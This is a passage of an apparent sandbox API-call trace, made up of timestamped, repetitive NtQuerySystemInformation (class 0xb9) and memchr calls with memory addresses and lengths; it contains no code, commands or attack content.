SystemInformation=0xa781ffdbb0, Length=0x38, ResultLength=0x0) [0233.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbb0, Length=0x38, ResultLength=0x0) [0233.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.808] memchr (_Buf=0x26948aa470a, _Val=0, _MaxCount=0x65) returned 0x26948aa470a [0233.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbb0, Length=0x38, ResultLength=0x0) [0233.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbb0, Length=0x38, ResultLength=0x0) [0233.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbb0, Length=0x38, ResultLength=0x0) [0233.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.809] memchr (_Buf=0x26948aa4734, _Val=0, _MaxCount=0x3b) returned 0x26948aa473a [0233.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbb0, Length=0x38, ResultLength=0x0) [0233.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbb0, Length=0x38, ResultLength=0x0) [0233.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbb0, Length=0x38, ResultLength=0x0) [0233.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.810] memchr (_Buf=0x26948aa475b, _Val=0, _MaxCount=0x14) returned 0x26948aa475b [0233.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbb0, Length=0x38, ResultLength=0x0) [0233.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbb0, Length=0x38, ResultLength=0x0) [0233.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.811] memchr (_Buf=0x26948aa4768, _Val=0, _MaxCount=0x7) returned 0x26948aa4768 [0233.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbb0, Length=0x38, ResultLength=0x0) [0233.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbb0, Length=0x38, ResultLength=0x0) [0233.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.811] memchr (_Buf=0x26948aa476e, _Val=0, _MaxCount=0x1) returned 0x26948aa476e [0233.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbb0, Length=0x38, ResultLength=0x0) [0233.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbb0, Length=0x38, ResultLength=0x0) [0233.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbb0, Length=0x38, ResultLength=0x0) [0233.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbb0, Length=0x38, ResultLength=0x0) [0233.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd58, Length=0x38, ResultLength=0x0) [0233.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd58, Length=0x38, ResultLength=0x0) [0233.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde98, Length=0x30, ResultLength=0x0) [0233.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffddd0, Length=0x28, ResultLength=0x0) [0233.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc70, Length=0x20, ResultLength=0x0) [0233.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc20, Length=0x20, ResultLength=0x0) [0233.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd68, Length=0x38, ResultLength=0x0) [0233.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbd0, Length=0x38, ResultLength=0x0) [0233.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbd0, Length=0x38, ResultLength=0x0) [0233.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb10, Length=0x30, ResultLength=0x0) [0233.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda80, Length=0x28, ResultLength=0x0) [0233.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb10, Length=0x30, ResultLength=0x0) [0233.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbd0, Length=0x38, ResultLength=0x0) [0233.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbd0, Length=0x38, ResultLength=0x0) [0233.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.818] memchr (_Buf=0x26948aa45c0, _Val=0, _MaxCount=0x1af) returned 0x26948aa45c8 [0233.818] memchr (_Buf=0x26948aa45c9, _Val=0, _MaxCount=0x1a6) returned 0x26948aa45d4 [0233.819] memchr (_Buf=0x26948aa45d5, _Val=0, _MaxCount=0x19a) returned 0x26948aa45e1 [0233.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbd0, Length=0x38, ResultLength=0x0) [0233.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbd0, Length=0x38, ResultLength=0x0) [0233.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbd0, Length=0x38, ResultLength=0x0) [0233.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbd0, Length=0x38, ResultLength=0x0) [0233.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.820] memchr (_Buf=0x26948aa45fe, _Val=0, _MaxCount=0x171) returned 0x26948aa4606 [0233.820] memchr (_Buf=0x26948aa4607, _Val=0, _MaxCount=0x168) returned 0x26948aa4610 [0233.820] memchr (_Buf=0x26948aa4611, _Val=0, _MaxCount=0x15e) returned 0x26948aa4622 [0233.820] memchr (_Buf=0x26948aa4623, _Val=0, _MaxCount=0x14c) returned 0x26948aa462c [0233.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbd0, Length=0x38, ResultLength=0x0) [0233.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbd0, Length=0x38, ResultLength=0x0) [0233.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbd0, Length=0x38, ResultLength=0x0) [0233.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbd0, Length=0x38, ResultLength=0x0) [0233.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbd0, Length=0x38, ResultLength=0x0) [0233.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbd0, Length=0x38, ResultLength=0x0) [0233.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.821] memchr (_Buf=0x26948aa463d, _Val=0, _MaxCount=0x132) returned 0x26948aa4645 [0233.821] memchr (_Buf=0x26948aa4646, _Val=0, _MaxCount=0x129) returned 0x26948aa464e [0233.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbd0, Length=0x38, ResultLength=0x0) [0233.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbd0, Length=0x38, ResultLength=0x0) [0233.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbd0, Length=0x38, ResultLength=0x0) [0233.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd68, Length=0x38, ResultLength=0x0) [0233.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde98, Length=0x30, ResultLength=0x0) [0233.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde98, Length=0x30, ResultLength=0x0) [0233.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde20, Length=0x20, ResultLength=0x0) [0233.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc20, Length=0x20, ResultLength=0x0) [0233.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc30, Length=0x20, ResultLength=0x0) [0233.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbc0, Length=0x20, ResultLength=0x0) [0233.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7f0, Length=0x20, ResultLength=0x0) [0233.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7a0, Length=0x20, ResultLength=0x0) [0233.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0233.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5f0, Length=0x20, ResultLength=0x0) [0233.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5a0, Length=0x20, ResultLength=0x0) [0233.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd550, Length=0x20, ResultLength=0x0) [0233.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7f0, Length=0x20, ResultLength=0x0) [0233.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7a0, Length=0x20, ResultLength=0x0) [0233.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0233.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5f0, Length=0x20, ResultLength=0x0) [0233.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5a0, Length=0x20, ResultLength=0x0) [0233.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7f0, Length=0x20, ResultLength=0x0) [0233.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7a0, Length=0x20, ResultLength=0x0) [0233.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0233.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5f0, Length=0x20, ResultLength=0x0) [0233.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5a0, Length=0x20, ResultLength=0x0) [0233.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7f0, Length=0x20, ResultLength=0x0) [0233.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7a0, Length=0x20, ResultLength=0x0) [0233.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0233.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5f0, Length=0x20, ResultLength=0x0) [0233.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5a0, Length=0x20, ResultLength=0x0) [0233.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.888] NtQuerySystemInformation 